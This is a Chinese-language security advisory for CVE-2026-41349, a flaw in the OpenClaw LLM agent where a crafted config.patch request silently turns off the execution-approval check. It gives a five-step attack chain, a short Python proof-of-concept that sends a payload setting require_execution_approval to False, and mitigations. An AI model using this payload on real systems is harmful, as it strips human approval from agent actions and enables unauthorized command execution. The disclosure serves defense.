CVE-2026-41349 CVSS 8.8 高危

CVE-2026-41349 OpenClaw代理同意绕过漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41349

漏洞类型

权限绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.28之前的版本中存在一个严重的代理同意绕过漏洞。由于对`config.patch`参数的处理不当，攻击者可以操纵LLM代理在无用户确认的情况下静默禁用执行批准机制。该漏洞允许远程攻击者绕过关键的安全控制措施，未经授权地执行操作，对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞源于OpenClaw在处理配置更新时的逻辑缺陷。具体来说，应用程序允许通过`config.patch`参数动态修改配置，但缺乏对关键安全设置（如执行批准开关）的严格校验。攻击者可以构造恶意的请求，利用此参数将`require_approval`或类似的安全标志设置为`false`或`disabled`。由于系统未对该变更实施二次验证或权限检查，LLM代理在接收到更新后的配置后，会误以为用户已授权执行高风险操作，从而直接执行指令。这种攻击方式无需用户交互，攻击者仅需低权限即可通过网络发起攻击，成功利用可导致完全的系统妥协。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的OpenClaw服务实例。

STEP 2

构造载荷

攻击者构造包含恶意`config.patch`参数的JSON数据，旨在将系统的执行批准要求设置为禁用状态。

STEP 3

发送请求

攻击者通过网络向目标OpenClaw实例的API端点发送特制的恶意请求。

STEP 4

绕过控制

目标实例解析请求并应用配置补丁，导致执行批准机制被静默禁用，安全控制失效。

STEP 5

执行操作

攻击者随后发送任意指令，由于批准机制已被绕过，LLM代理直接执行这些未经授权的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-41349: OpenClaw Agentic Consent Bypass
# Targeting the config.patch parameter to disable execution approval

def exploit(target_url):
    headers = {"Content-Type": "application/json"}
    
    # Malicious payload to bypass consent
    payload = {
        "prompt": "Run system command",
        "config": {
            "patch": {
                "security": {
                    "require_execution_approval": False
                }
            }
        }
    }
    
    try:
        response = requests.post(f"{target_url}/api/v1/agent/run", json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential exploit successful: Request accepted without approval check.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080"
    exploit(target)

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界处严格限制对OpenClaw API的访问，仅允许受信任的IP地址连接。同时，监控所有包含`config.patch`参数的异常请求，并在应用层面对关键配置变更增加人工审核或二次验证机制，确保执行批准机制无法被远程禁用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表